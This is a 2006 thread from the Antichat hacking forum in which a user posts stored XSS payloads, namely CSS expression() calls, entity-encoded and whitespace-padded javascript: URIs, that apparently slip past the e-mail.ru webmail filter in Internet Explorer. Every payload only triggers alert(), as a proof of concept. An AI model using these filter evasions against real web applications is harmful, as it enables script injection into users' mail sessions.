Форум АНТИЧАТ - xss на e-mail.ru(актив)

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - xss на e-mail.ru(актив) (https://forum.antichat.xyz/showthread.php?t=29286)

VampiRUS

17.12.2006 09:51

xss на e-mail.ru(актив)

Код:

<span style=top:expression(alert())></span>

<span sss="alert();this.sss=null" style=top:expression(eval(this.sss));></span>

<img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert()>

<img src="javascript        :alert()"> и прочие извращения с пробелами и табуляцией

работают в ie.

†Romi4†

17.12.2006 10:09

тебе сюда:
http://forum.antichat.ru/thread21437.html

VampiRUS

17.12.2006 10:14

ну это актив, а не пасив. А там постятся пассивные xss на сколько я смог заметить.

Время: 23:35